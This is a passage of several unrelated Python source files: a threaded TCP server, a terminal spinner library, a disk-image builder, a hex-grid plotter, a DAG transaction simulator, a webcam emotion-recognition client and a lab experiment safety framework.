Actually processes the request by instantiating RequestHandlerClass and calling its handle() method.
'''
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.finish_request(
self, request, client_address,
)
'''
close socket when client was disconnecting
'''
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
# delete client
#self.del_client(request_address)
# del client from general list by socket descriptor
self.del_client_by_sock(request_address)
return socketserver.TCPServer.close_request(
self, request_address,
)
'''
delete all clients from the list
'''
def clearClientsList(self):
self._clientsCount = 0
self._clients.clear()
'''
Tell the serve_forever() loop to stop and wait until it does.
'''
def shutdown(self):
# clear general clients list
self.clearClientsList()
self.logger.debug('shutdown()')
return socketserver.TCPServer.shutdown(self)
#class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
class ThreadedTCPServer:
def __init__(self, curServPort=3333):
self._logger = logging.getLogger('server')
self._curIP = sock.gethostbyname(sock.gethostname())
# curIP = "192.168.0.27"
# print("IP = ", curIP)
self._curServPort = curServPort
def run(self):
# address = (curIP, 0) # let the kernel assign a port
address = (self._curIP, self._curServPort) # custom assign a port
# address = ("localhost", curServPort) # custom assign a port
server = TCPServer(address, RequestsHandler)
ip, port = server.server_address # what port was assigned?
# Start the server in a thread
t = thrd.Thread(target=server.serve_forever)
#t.setDaemon(True) # don't hang on exit
t.start()
print('Server loop running in process: PID = ', os.getpid())
self._logger.info('Server on SERVER_IPv4: %s and PORT: %s', ip, port)
# Clean up
# server.shutdown()
# logger.debug('closing socket')
# logger.debug('done')
# server.socket.close()
if __name__ == '__main__':
threadingTCPServer = ThreadedTCPServer()
threadingTCPServer.run()
|
display.py
|
"""Simple display library for check-your-pulse."""
# Standard Python Libraries
import itertools
import os
import shutil
import sys
import threading
import time
class Color:
"""Provide us with a means of making colored text."""
@staticmethod
def _red(line: str) -> str:
return f"\x1b[1;31m{line}\x1b[0m"
@staticmethod
def _green(line: str) -> str:
return f"\x1b[1;32m{line}\x1b[0m"
@staticmethod
def _blue(line: str) -> str:
return f"\x1b[1;34m{line}\x1b[0m"
@staticmethod
def _violet(line: str) -> str:
return f"\x1b[1;35m{line}\x1b[0m"
@staticmethod
def _yellow(line: str) -> str:
return f"\x1b[1;33m{line}\x1b[0m"
# Much of this code was bitten from the great yaspin library. We wanted to do some animation without our customers
# needing to install an external library, so we modified their spinner and got rid of things we didn't need for this
# use case.
# Check them out here: https://github.com/pavdmyt/yaspin
class Animation(Color):
"""Provide us with a means of making a spinner."""
def __init__(self, text: str = ""):
"""
Instantiate the Animation class, then the animation can be started with Animation.start(text).
:param text: Text displayed to the right of the animation.
"""
super().__init__()
self._cycle = itertools.cycle(
[
"[ C]",
"[ CI]",
"[ CIS]",
"[CISA]",
"[ISA ]",
"[SA ]",
"[A ]",
"[ ]",
]
)
self._stop_animation = threading.Event()
self._stdout_lock = threading.Lock()
self._animation_thread = threading.Thread()
self.text: str = f" {text}"
def _animation(self) -> None:
"""
Run background thread started by start() and interrupted by done() or error().
Returns:
None
"""
while not self._stop_animation.is_set():
spin_phase = next(self._cycle)
if os.name != "nt":
out = self._blue(spin_phase) + self.text
else:
out = spin_phase + self.text
with self._stdout_lock:
_clear_console()
sys.stdout.write(out)
sys.stdout.flush()
time.sleep(0.1)
def start(self, text: str = "") -> None:
"""
Start the background thread for our animation.
Args:
text (str), Optional: Text to print to the terminal after the animation.
Returns:
None
"""
self._text_format(text)
self._stop_animation = threading.Event()
self._animation_thread = threading.Thread(target=self._animation)
self._animation_thread.start()
def done(self, text: str = "") -> None:
"""
Stop our background thread and print a green [Done] in place of the animation.
Args:
text (str), Optional: Text to print after [Done].
Returns:
None
"""
self._text_format(text)
if self._animation_thread:
self._stop_animation.set()
self._animation_thread.join()
_clear_console()
if os.name != "nt":
print(self._green("[Done]") + self.text)
else:
print("[Done]" + self.text)
sys.stdout.write("\r")
def error(self, text: str = "") -> None:
"""
Stop our background thread and print a red [Error] in place of the animation.
Args:
text (str), Optional: Text to print after [Error].
Returns:
None
"""
self._text_format(text)
if self._animation_thread:
self._stop_animation.set()
self._animation_thread.join()
_clear_console()
if os.name != "nt":
print(self._red("[Error]") + self.text)
else:
print("[Error]" + self.text)
def update(self, text: str = "") -> None:
"""
Update the text in the animation.
Args:
text (str): Text next to the animation.
Returns:
None
"""
self.text = f" {text}"
def _text_format(self, text):
if text:
term_size = shutil.get_terminal_size(fallback=(80, 24)).columns
if len(text) > term_size:
text = text[0 : (term_size - 15)]
text += " ..."
self.text = f" {text}"
@staticmethod
def _hide_cursor():
if os.name != "nt":
sys.stdout.write("\033[?25l")
sys.stdout.flush()
@staticmethod
def _show_cursor():
if os.name != "nt":
sys.stdout.write("\033[?25h")
sys.stdout.flush()
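# Hypothetical usage sketch for Animation (the messages are illustrative):
#
#     anim = Animation("Checking hosts...")
#     anim.start()
#     ...  # long-running work
#     anim.update("Still checking hosts...")
#     anim.done("All hosts checked.")   # or anim.error("Host check failed.")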
def _clear_console():
if os.name != "nt":
sys.stdout.write("\033[2K\033[1G")
sys.stdout.write("\r")
def _center(line):
term_size = shutil.get_terminal_size(fallback=(80, 24)).columns
line_len = len(line)
return int((term_size - line_len) / 2)
ascii_art = """
_ _ _
| | | | | |
___| |__ ___ ___| | ________ _ _ ___ _ _ _ __ ______ _ __ _ _| |___ ___
/ __| '_ \\ / _ \\/ __| |/ /______| | | |/ _ \\| | | | '__|______| '_ \\| | | | / __|/ _ \
| (__| | | | __/ (__| < | |_| | (_) | |_| | | | |_) | |_| | \\__ \\ __/
\\___|_| |_|\\___|\\___|_|\\_\\ \\__, |\\___/ \\__,_|_| | .__/ \\__,_|_|___/\\___|
__/ | | |
|___/ |_| \n
"""
|
image-builder.py
|
#!/usr/bin/python3
import os
import sys
import re
import yaml
import threading
#################################
# Util
#################################
class ThreadPool:
def __init__(self):
self._threads = []
def add_thread(self, proc):
thrd = threading.Thread(target=proc)
thrd.start()
self._threads.append(thrd)
def join(self):
for thrd in self._threads:
thrd.join()
self._threads.clear()
def c(cmd, expected=[0]):
print(cmd)
assert os.system(cmd) in expected
#################################
# Partition
#################################
def create_using_parted(t):
def create(config):
c(f"parted {config['file']} -s -a minimal mktable {t}")
return create
image_partition = {
'gpt': create_using_parted('gpt'),
'mbr': create_using_parted('mbr'),
}
#################################
# FS
#################################
def create_fat(size):
    def create(partition):
        c(f'mkfs.fat -F{size} -s 1 part{partition["num"]}.img')
    return create
def create_ext(typ):
def create(partition):
c(f'mke2fs -t ext{typ} part{partition["num"]}.img')
return create
def create_echfs(partition):
    c(f'echfs-utils part{partition["num"]}.img format 512')
image_fs = {
'fat12': create_fat(12),
'fat16': create_fat(16),
'fat32': create_fat(32),
'ext2': create_ext(2),
'ext3': create_ext(3),
'ext4': create_ext(4),
'echfs': create_echfs,
}
#################################
# Move files
#################################
def copy_fat(partition):
partpath = os.path.abspath(f'part{partition["num"]}.img')
if len(os.listdir(partition["content"])) != 0:
files = "\" \"".join(os.listdir(partition["content"]))
c(f'cd {partition["content"]} && mcopy -s -b -i {partpath} -D overwrite "{files}" ::')
def copy_ext(partition):
for subdir, dirs, files in os.walk(partition['content']):
for d in dirs:
c(f'e2mkdir part{partition["num"]}.img:{os.path.join(subdir, d)[len(partition["content"]):]}')
for f in files:
c(f'e2cp {os.path.join(os.path.abspath(subdir), f)} part{partition["num"]}.img:{os.path.join(subdir, f)[len(partition["content"]):]}')
def copy_echfs(partition):
for subdir, dirs, files in os.walk(partition['content']):
for d in dirs:
c(f'echfs-utils part{partition["num"]}.img mkdir {os.path.join(subdir, d)[len(partition["content"]):]}')
for f in files:
c(f'echfs-utils part{partition["num"]}.img import {os.path.join(os.path.abspath(subdir), f)} {os.path.join(subdir, f)[len(partition["content"]):]}')
copy_files = {
'fat12': copy_fat,
'fat16': copy_fat,
'fat32': copy_fat,
'ext2': copy_ext,
'ext3': copy_ext,
'ext4': copy_ext,
'echfs': copy_echfs
}
#################################
# Parsing
#################################
size_shift = {
'M': 11,
'G': 21,
}
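# The shifts above convert a size given in MiB ('M') or GiB ('G') into a count
# of 512-byte sectors: 1 MiB = 2**20 bytes = 2**11 sectors and
# 1 GiB = 2**30 bytes = 2**21 sectors, so e.g. '64M' becomes 64 << 11 = 131072
# sectors.
#
# Hypothetical shape of a parsed config, assuming only the keys accessed in
# main() below; the values are illustrative:
#
#     {
#         'file': 'disk.img',
#         'size': '64M',
#         'type': 'gpt',
#         'partitions': [
#             {'label': 'boot', 'fs': 'fat32', 'size': '32M',
#              'bootable': True, 'content': './boot'},
#             {'label': 'root', 'fs': 'ext2', 'size': 'fit',
#              'content': './rootfs'},
#         ],
#     }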
def main(args):
if len(args) <= 1:
print(f"Usage: {args[0]} <config> [alternative file]")
else:
with open(args[1], 'rb') as f:
config = yaml.load(f.read(), Loader=yaml.FullLoader)
# File override
if len(args) > 2:
config['file'] = args[2]
threads = ThreadPool()
#
# Get the image config
#
assert 'file' in config, "No filename given :("
assert 'size' in config, "No size given :("
ofile = config['file']
#
# Get the size
#
size_unit = config['size'][-1]
size_num = int(config['size'][:-1])
assert size_unit in size_shift, f"Invalid size unit {size_unit}"
disk_sectors = size_num << size_shift[size_unit]
#
# Parse the configuration to get a list of partitions
#
partitions = []
partition_start = 2048
assert 'partitions' in config, "No partitions in config :("
for partition in config['partitions']:
assert 'fs' in partition, f"No filesystem given for partition in part {len(partitions)} :("
assert partition['fs'] in image_fs, f"Invalid filesystem type {partition['fs']}, supported {image_fs.keys()} :("
assert 'size' in partition, f"No size given for partition in part {len(partitions)} :("
# Calculate size
if partition['size'] == 'fit':
sectors = disk_sectors - partition_start - 2048 + 1
else:
part_size_unit = partition['size'][-1]
part_size_num = int(partition['size'][:-1])
                assert part_size_unit in size_shift, f"Invalid size unit {part_size_unit} in part {len(partitions)} :("
                sectors = part_size_num << size_shift[part_size_unit]
partitions.append({
'num': len(partitions),
'start': partition_start,
'end': partition_start + sectors,
'size': sectors,
'fs': partition['fs'],
'bootable': partition['bootable'] if 'bootable' in partition else False,
'content': partition['content'] if 'content' in partition else None,
'label': partition['label'] if 'label' in partition else None,
})
partition_start += sectors
#
# If the output file does not exists then create a new device with the correct
# partitions, if it does exist we are going to assume the partitions are correct
# TODO: maybe don't assume lol
#
if not os.path.exists(ofile):
# Create the image itself
c(f"dd if=/dev/zero of={ofile} bs=1{size_unit} count={config['size'][:-1]}")
# Partition the image
            assert 'type' in config, "No partition type given :("
            assert config['type'] in image_partition, f"Unsupported partition type {config['type']}, supported: {image_partition.keys()} :("
            image_partition[config['type']](config)
num = 1
for partition in partitions:
if partition['fs'] in ['echfs']:
c(f'parted {ofile} -s -a minimal mkpart {partition["label"]} {partition["start"]}s {partition["end"] - 1}s')
else:
c(f'parted {ofile} -s -a minimal mkpart {partition["label"]} {partition["fs"]} {partition["start"]}s {partition["end"] - 1}s')
if 'bootable' in partition and partition['bootable']:
c(f"parted {ofile} -s -a minimal toggle {num} boot")
num += 1
for partition in partitions:
threads.add_thread(lambda: c(f"dd if=/dev/zero of=part{partition['num']}.img bs=512 count={partition['size']}"))
threads.join()
for partition in partitions:
                threads.add_thread(lambda partition=partition: image_fs[partition['fs']](partition))
threads.join()
#
# If the file does not exists then
#
else:
# Convert to a raw image so we can extract the partitions
if config['file'].endswith('.vmdk'):
c(f'qemu-img convert -f vmdk -O raw {config["file"]} {config["file"]}')
elif config['file'].endswith('.vdi'):
c(f'qemu-img convert -f vdi -O raw {config["file"]} {config["file"]}')
# extract all of the partitions
for partition in partitions:
                threads.add_thread(lambda partition=partition: c(f'dd if={ofile} of=part{partition["num"]}.img bs=512 skip={partition["start"]} count={partition["size"]}'))
threads.join()
# copy all of the files (will not delete ones)
for partition in partitions:
if partition['content'] is not None:
                threads.add_thread(lambda partition=partition: copy_files[partition['fs']](partition))
threads.join()
# Cleanup all of the left over partitions
for partition in partitions:
c(f'dd if=part{partition["num"]}.img of={ofile} bs=512 seek={partition["start"]} count={partition["size"]} conv=notrunc')
os.unlink(f'part{partition["num"]}.img')
# convert to the wanted image
if config['file'].endswith('.vmdk'):
c(f'qemu-img convert -f raw -O vmdk {config["file"]} {config["file"]}')
elif config['file'].endswith('.vdi'):
c(f'qemu-img convert -f raw -O vdi {config["file"]} {config["file"]}')
if __name__ == "__main__":
main(sys.argv)
|
plot_pil.py
|
# coding=utf-8
import threading
import numpy as np
import os
import time
import imageio
import errno
from PIL import Image, ImageDraw, ImageFont
axial_to_pixel_mat = np.array([[3 / 2., 0], [np.sqrt(3) / 2.0, np.sqrt(3)]])
# Circles in 24x24 bounding boxes
CIRCLE_BOUNDING = np.array([24, 24])
# Circles 24 apart
CIRCLE_DIST = 24
# Edges 4px wide
EDGE_WIDTH = 4
# Text size as a multiple of the screen height
TEXT_FACTOR = 100.0
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def save_plt(plot, filename):
plot.save(filename)
plot.close()
class RasterPlotter(object):
def __init__(self, compression_simulator, path=None, gif_path=None):
self.compression_simulator = compression_simulator
self.min_pos = axial_to_pixel_mat.dot(compression_simulator.grid.min - np.array([1, 1])) * CIRCLE_DIST
self.max_pos = axial_to_pixel_mat.dot(compression_simulator.grid.max + np.array([1, 1])) * CIRCLE_DIST
self.size = (self.max_pos - self.min_pos).astype(int)
self.center = self.size / 2
# self.font = FONT
self.font = ImageFont.truetype(os.path.join(os.path.dirname(os.path.realpath(__file__)), "cmunorm.ttf"),
int(self.size[1] / TEXT_FACTOR))
if path is None:
path = os.path.join("output", type(self.compression_simulator).__name__, str(int(time.time())))
if gif_path is None:
gif_path = os.path.join(path, "result.gif")
if callable(path):
self.path = path()
else:
self.path = path
mkdir_p(self.path)
self.gif_path = gif_path
self.gif_writer = imageio.get_writer(self.gif_path, mode="I", duration=0.5)
self.closed = False
def get_position_from_axial(self, axial_coordinates):
return axial_to_pixel_mat.dot(axial_coordinates) * CIRCLE_DIST + self.center
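    # For example, axial coordinate (1, 0) maps to
    # axial_to_pixel_mat.dot([1, 0]) * CIRCLE_DIST = [1.5, sqrt(3)/2] * 24,
    # i.e. roughly [36.0, 20.8] pixels, before self.center shifts it into the
    # image.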
def draw_plot(self):
if self.closed:
raise ValueError("This plotter has been closed.")
plt = Image.new('RGB', tuple(self.size), (255, 255, 255))
draw = ImageDraw.Draw(plt)
drawn_hexagons = {}
for key in xrange(len(self.compression_simulator.grid.extrema)):
extremum = self.compression_simulator.grid.extrema[key]
pos = self.get_position_from_axial(extremum)
draw.ellipse([tuple(pos - (CIRCLE_BOUNDING / 2)), tuple(pos + (CIRCLE_BOUNDING / 2))], (255, 0, 0))
neighbor_extremum = self.compression_simulator.grid.extrema[key - 1]
neighbor_pos = self.get_position_from_axial(neighbor_extremum)
draw.line([tuple(pos), tuple(neighbor_pos)], (255, 0, 0), EDGE_WIDTH)
if True:
# This part draws the particles & their links
for particle in self.compression_simulator.grid.get_all_particles():
position = self.get_position_from_axial(particle.axial_coordinates)
# Draw lines to neighbors
neighbors_positions = [self.get_position_from_axial(neighbor.axial_coordinates) for neighbor in
self.compression_simulator.grid.get_neighbors(particle.axial_coordinates) if
neighbor not in drawn_hexagons]
tuple_position = tuple(position)
for neighbor_position in neighbors_positions:
draw.line([tuple_position, tuple(neighbor_position)], (100, 100, 100), EDGE_WIDTH)
draw.ellipse([tuple(position - (CIRCLE_BOUNDING / 2)), tuple(position + (CIRCLE_BOUNDING / 2))],
particle.get_color())
# draw.text(tuple(position), "%.2f" % particle.bias if hasattr(particle, "bias") else "N/A", (0,0,0), self.font)
drawn_hexagons[particle] = True
start = self.get_position_from_axial(self.compression_simulator.grid.max)
start = np.array([self.size[0] - start[0], start[1]])
shift = (np.array([0, self.size[1]]) * 1.1 / TEXT_FACTOR).astype(int)
metrics = self.compression_simulator.get_metrics()
metric_count = len(metrics)
for key in xrange(metric_count):
metric = metrics[key]
metrictext = metric[0] + ": " + (metric[1] % metric[2])
draw.text(tuple(start - shift * (metric_count - key)), metrictext, (0, 0, 0), self.font)
start = self.get_position_from_axial(self.compression_simulator.grid.min)
start = np.array([self.size[0] - start[0], start[1]])
text = "Algorithm: %s" % type(self.compression_simulator).__name__
w, h = draw.textsize(text, self.font)
draw.text(start - np.array([w, 0]), text, (0, 0, 0), self.font)
start += shift
text = "Start time: %s" % self.compression_simulator.start_time
w, h = draw.textsize(text, self.font)
draw.text(start - np.array([w, 0]), text, (0, 0, 0), self.font)
return plt
def plot(self, filename):
plt = self.draw_plot()
self.gif_writer.append_data(np.array(plt))
# threading.Thread(target=save_plt, args=(plt, os.path.join(self.path, filename))).start()
save_plt(plt, os.path.join(self.path, filename))
def close(self):
plt = self.draw_plot()
for x in xrange(9):
self.gif_writer.append_data(np.array(plt))
self.gif_writer.close()
self.closed = True
# imageio.mimsave(self.gif_path, [np.asarray(x) for x in self.gif_writer], duration=0.5)
# for img in self.gif_writer:
# img.close()
|
Orchestrator.py
|
import threading
import matplotlib.pyplot as plt
from base.DAG import DAG
from base.CAC import DAG_C
import time
import random
startTime = 0
def getTime():
global startTime
if startTime == 0:
startTime = time.time()
timeNow = time.time()
time_ = timeNow - startTime
return int(time_)
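# getTime() returns the whole seconds elapsed since startTime was last
# initialised: the first call after startTime is (re)set to 0 returns 0, and a
# call made roughly 2.5 s later returns 2.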
def start_helper(sim):
    '''
    :param sim: simulator object
    :return: dag : DAG
    '''
    global startTime
# Set plots for resulting dag image
plt.rc('axes', labelsize=20)
plt.rc('xtick', labelsize=20)
plt.rc('ytick', labelsize=20)
plt.figure(figsize=(25, 10))
if sim.algorithm == "cac":
# Call the DAG to generate transactions
dag = DAG_C(plot=True, numUsers=sim.numTotalUser, numMalUsers=sim.numMalUser, traPerUser=sim.traUser, reattachment=sim.nodeReattachment)
startTime = 0
threads = []
for userId in range(sim.numTotalUser):
threads.append(threading.Thread(target=cac_for_user, args=(dag, userId, sim.traUser)))
for t in threads:
t.start()
for t in threads:
t.join()
else:
# Call the DAG to generate transactions
dag = DAG(rate=sim.alpha, algorithm=sim.algorithm, plot=True)
for i in range(sim.transactions):
dag.generate_next_node()
# Return the result
return dag
def cac_for_user(dag, userId, transactionNum):
user = [u for u in dag.users if u.id == userId][0]
if user.malicious:
time.sleep(random.uniform(5, 12))
timee = getTime()
dag.generate_next_node(userId=userId, time=timee, malicious=True)
else:
for i in range(transactionNum):
timee = getTime()
dag.generate_next_node(userId=userId, time=timee)
time.sleep(random.uniform(1, 5))
dag.generate_next_node(userId=None, time=timee)
|
video_stream.py
|
from .face_capture import deep_convert
import cv2
import numpy as np
import json
import requests
import threading
import queue
que = queue.Queue()
def storeInQueue(f):
def wrapper(*args):
que.put(f(*args))
return wrapper
@storeInQueue
def get_tf_response(config, roi, model_mode):
max_idx = 5
max_percentage = 100
api = config['EMOTION_API']
push_data_json = wrap_data(roi)
if model_mode == 0:
max_idx, max_percentage = 5, 100
api = config['MOOD_API']
try:
request = requests.post(api, data=push_data_json, timeout=config['REQUEST_TIMEOUT']).text
response = json.loads(request)
if 'predictions' in response:
predictions = response['predictions'][0]
max_idx = np.argmax(predictions)
max_percentage = round(predictions[max_idx] * 100, 2)
else:
print(response)
return max_idx, max_percentage
    except Exception:
        print('Caught an error while requesting the prediction APIs')
return max_idx, max_percentage
def wrap_data(roi):
roi = cv2.resize(roi, (200, 200), interpolation=cv2.INTER_AREA)
output = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
output = output.reshape(1, 200, 200) / 255.
img_info = output.tolist()
data = {'instances': img_info}
push_data_json = json.dumps(data, sort_keys=True, separators=(',', ': '))
return push_data_json
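# wrap_data() above builds the JSON body for what appears to be a TensorFlow
# Serving style REST endpoint: a single 200x200 grayscale frame scaled to
# [0, 1], e.g. (illustrative values):
#
#     {"instances": [[[0.0, 0.01, ...], ...]]}   # shape 1 x 200 x 200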
def video_stream(config):
num_frames = 0
max_emotion_idx, max_mood_idx = 5, 1
max_emotion_percentage, max_mood_percentage = 100, 100
cap = cv2.VideoCapture(0)
threads = []
if not (cap.isOpened()):
print('Could not open video device')
else:
ret, frame = cap.read()
while ret:
found_face, roi = deep_convert(config, frame, (max_emotion_idx, max_mood_idx), (max_emotion_percentage, max_mood_percentage))
if found_face:
if num_frames % config['FRAMES_PER_REQUEST'] == 0:
mode = (num_frames / config['FRAMES_PER_REQUEST'] - 1) % 2
if len(threads) > 0:
threads[0].join()
threads.pop(0)
max_idx, max_percentage = que.get()
if mode == 0:
max_emotion_idx, max_emotion_percentage = max_idx, max_percentage
else:
max_mood_idx, max_mood_percentage = max_idx, max_percentage
t = threading.Thread(target=get_tf_response, args=(config, roi, mode))
t.setDaemon(True)
threads.append(t)
t.start()
num_frames += 1
# show the frame
cv2.imshow('Video Streaming', frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord('q'):
break
ret, frame = cap.read()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
return
|
experiment.py
|
from abc import ABC, abstractmethod
import logging
import os
import signal
import threading
from catkit import datalogging
from catkit.multiprocessing import DEFAULT_TIMEOUT, EXCEPTION_SERVER_ADDRESS, Process, SharedMemoryManager
from catkit.util import raise_signal
STOP_EVENT = "catkit_stop_event"
FINISH_EVENT = "catkit_soft_stop_event"
SAFETY_EVENT = "catkit_safety_event"
SAFETY_BARRIER = "catkit_safety_barrier"
class SafetyException(Exception):
pass
class StopException(Exception):
pass
class SafetyTest(ABC):
def __init__(self, *args, max_consecutive_failures=0, **kwargs):
super().__init__(*args, **kwargs)
self.name = None
self.log = logging.getLogger()
# Permit <max_consecutive_failures> consecutive failures before failing test and raising.
self.max_consecutive_failures = max_consecutive_failures
self.consecutive_failure_counter = 0
def do_check(self, force_raise=False):
try:
self.check()
except Exception as error:
if force_raise:
raise
self.consecutive_failure_counter += 1
if self.consecutive_failure_counter > self.max_consecutive_failures:
raise
else:
self.log.warning(f"Safety test warning issued for {self.name}: {error}")
else:
self.consecutive_failure_counter = 0
@abstractmethod
def check(self):
"""Implement to conduct safety check and raise a SafetyException upon failure. """
class Testbed:
""" Class for owning testbed infrastructure such as any shared memory servers and running safety checks. """
# NOTE: The following event isn't implicitly used nor waited upon, it's hosted here such that it can be imported.
STOP_EVENT = "stop the testbed running"
def __init__(self, safety_tests, output_path=None, suffix=None,
safety_check_interval=60):
"""
Parameters
----------
safety_tests : list
List of SafetyTest class defs, not already instantiated objects (nothing else should own these).
safety_check_interval : int, float, optional:
Time interval between calling check_safety().
output_path: str, optional
Output directory to write all files to (or to subdirectories thereof).
For the vast majority of use cases this should be left as None, in which
case it will be auto-generated based on date-time + suffix.
suffix : str, optional
Descriptive string to include as part of the path.
"""
self.log = None
self.output_path = output_path
self.suffix = suffix
self.init_path()
self.init_log()
self.safety_check_interval = safety_check_interval
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=True)
self.stop_event = None
self.finish_event = None
self.safety_event = None
self.barrier = None
self.safety_process = None
self.safety_tests = []
for test in safety_tests:
self.safety_tests.append(test())
def start(self):
try:
self._setup()
assert self.stop_event is not None
assert self.safety_event is not None
# Run an initial test before starting continuous monitoring.
# NOTE: These initial tests will always raise upon failure, irrespective of a test's max_consecutive_failures.
self.check_safety(force_raise=True)
# Start continuous monitoring.
self.safety_process = Process(target=self.safety_monitor, name="Safety Test Monitor", args=(self.barrier,))
self.safety_process.start() # NOTE: This will need to be joined.
# print(f" ### Safety tests monitored on PID: {self.safety_process.pid}")
self.log.info(f"Continuously monitoring safety tests... (on PID: {self.safety_process.pid})")
# Don't return until continuous monitoring has started.
self.barrier.wait()
return self
except Exception:
try:
try:
self.log.exception("The testbed encountered the following error(s):")
finally:
# NOTE: __exit__() is not called if this func raises.
self._teardown()
finally:
raise
def stop(self):
return self._teardown()
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.stop()
finally:
if exc_type:
self.log.exception("The testbed encountered the following error(s):")
def _setup(self):
""" Setup the necessary exception manager server and run safety check monitor.
Override this to start and context manage any and all other servers.
"""
# Start server to catch and manage exceptions from parallel processes.
self.exception_manager.start() # NOTE: This is joined in self._teardown().
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.finish_event = self.exception_manager.get_event(FINISH_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self.barrier = self.exception_manager.get_barrier(SAFETY_BARRIER, parties=2)
def check_safety(self, *args, **kwargs):
self.log.info("Running safety tests...")
for safety_test in self.safety_tests:
try:
safety_test.do_check(*args, **kwargs)
except Exception:
# NOTE: This order is critical such that self.safety_event is set before self.stop_event.wait() wakes.
self.safety_event.set()
self.stop_event.set()
# self.finish_event.set() # This is set in self._teardown().
raise
self.log.info("All Safety tests passed!")
def safety_monitor(self, barrier):
""" Monitor all safety checks.
NOTE: This is run on a child process.
"""
self.init_log()
barrier.wait()
while not self.stop_event.wait(self.safety_check_interval):
# NOTE: Upon failure, self.check_safety(), sets both self.safety_event and self.stop_event, and raises a
# SafetyException (in that order).
self.check_safety()
def _teardown(self):
""" Override this to stop/join/shutdown any and all other servers started by setup(). """
try:
try:
try:
if self.log:
self.log.info(" Cleaning up (teardown)...")
finally:
# Stop the safety monitor process so that it can be joined.
# NOTE: This will also stop EVERYTHING else - no safety := no experiment(s).
if self.stop_event:
self.stop_event.set()
self.finish_event.set()
finally:
if self.safety_process:
self.safety_process.join(DEFAULT_TIMEOUT)
finally:
# Shutdown the exception handler manager.
# NOTE: self.stop_event and self.safety_event are local to the exception manager server process and
# will not be accessible post shutdown.
if self.exception_manager is not None:
self.exception_manager.shutdown()
def init_path(self):
""" Set up output. """
pass
def init_log(self):
""" Initialize log writing.
Override to setup log handlers etc.
"""
self.log = logging.getLogger()
class Experiment:
"""
Base class that instills safety monitoring into any class that inherits it. Subclasses
need to implement a function called "experiment()".
"""
name = None
log = logging.getLogger()
data_log = datalogging.get_logger(__name__)
def __init__(self, output_path=None, suffix=None, stop_all_on_exception=True, run_forever=False,
disable_shared_memory=False, daemon=None):
""" Initialize attributes common to all Experiments.
All child classes should implement their own __init__ and call this via super()
Parameters
----------
output_path: str, optional
Output directory to write all files to (or to subdirectories thereof).
For the vast majority of use cases this should be left as None, in which
case it will be auto-generated based on date-time + suffix.
suffix : str, optional
Descriptive string to include as part of the path.
run_forever : bool, optional
Allows the experiment to continue running even when concurrent experiments have set the global stop event.
It will, however, stop for a safety event.
        stop_all_on_exception : bool, optional
            When False, allows peripheral concurrent experiments to run and fail (for example, from syntax errors)
            without stopping all other experiments.
disable_shared_memory : bool, optional
Disable shared memory. When True some peripheral shared memory will still exist and the main
experiment will run on the parent process. When False, the main experiment is run on a child process.
daemon : bool, optional
Passed to underlying Process that experiment is run on. See multiprocessing.Process for details.
"""
if self.name is None:
self.name = self.__class__.__name__
self.output_path = output_path
self.suffix = suffix
self.stop_all_on_exception = stop_all_on_exception
self.run_forever = run_forever
self.disable_shared_memory = disable_shared_memory
self.daemon = daemon
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=False)
self.experiment_process = None
self.safety_event = None
self._event_monitor_barrier = None
self._kill_event_monitor_event = None
# NOTE: STOP_EVENT uses a KeyboardInterrupt (SIGINT) to stop the experiment in its tracks, i.e., effectively
# immediately. Doing so, however, will most likely cause a cascade of other errors, e.g., if something is
# interrupted whilst communicating with a server which may result in the server itself shutting down thus
# stopping any subsequent communications with it. That being said, an immediate stop of other experiments may be
# desired to ensure the resultant state of the testbed, e.g., before calling post_experiment etc.
# All devices will still be safely closed by their server contexts.
self.stop_event = None
# NOTE: For more of a "soft stop" wait on the following event for synchronising when experiments should finish.
# This is NOT waited upon anywhere in this base class. It is only set upon exception. Check for this event in
# outer loops and break if set. Here "soft" just means that it may not stop immediately but instead wait for the
# rest of the loop to finish first.
self.finish_event = None
self.pre_experiment_return = None
self.experiment_return = None
self.post_experiment_return = None
self.init_path()
self.init_log()
def join(self, *args, **kwargs):
if self.experiment_process:
self.experiment_process.join(*args, **kwargs)
def set_all_events(self):
""" Set all stop events. This will remove some contrived deadlock scenarios.
This can be overridden and custom events added, however, don't forget to call this func via super().
"""
self.stop_event.set()
self.finish_event.set()
def start(self):
""" Start the experiment on a separate process and then returns (is non-blocking, it does not wait).
It works like multiprocessing.Process.start(), a join() is thus required.
"""
# Check that we can connect from the parent process.
self.exception_manager.connect() # Needs to have already been started.
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self.finish_event = self.exception_manager.get_event(FINISH_EVENT)
try:
if self.disable_shared_memory:
self.log.info(f"Running experiment on parent process (PID: {os.getpid()})...")
self.run_experiment()
else:
# Start the process to run the experiment.
self.log.info("Creating separate process to run experiment...")
self.experiment_process = Process(target=self.run_experiment, name=self.name, daemon=self.daemon)
self.experiment_process.start()
# print(f" ### Child experiment process on PID: {self.experiment_process.pid}")
self.log.info(f"{self.name} process started on PID: {self.experiment_process.pid}")
except Exception:
if self.stop_all_on_exception:
self.set_all_events()
raise
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.daemon:
self.join()
def event_monitor(self):
""" This is run on a thread on the child process running self.experiment(). It monitors events and then raises
to stop parent thread running self.experiment().
NOTE: It doesn't explicitly stop the parent process, it will implicitly stop the parent process if it's
waiting in a join() (which it needs to be).
"""
try: # This must always be running, so stop main thread upon exception.
self._event_monitor_barrier.wait() # Used to sync with the main thread so that it doesn't proceed without being monitored.
# Wait indefinitely (this is run on a daemonic thread).
if self.run_forever:
# Ignore stop_event but DON'T ignore safety_event.
self.safety_event.wait()
else:
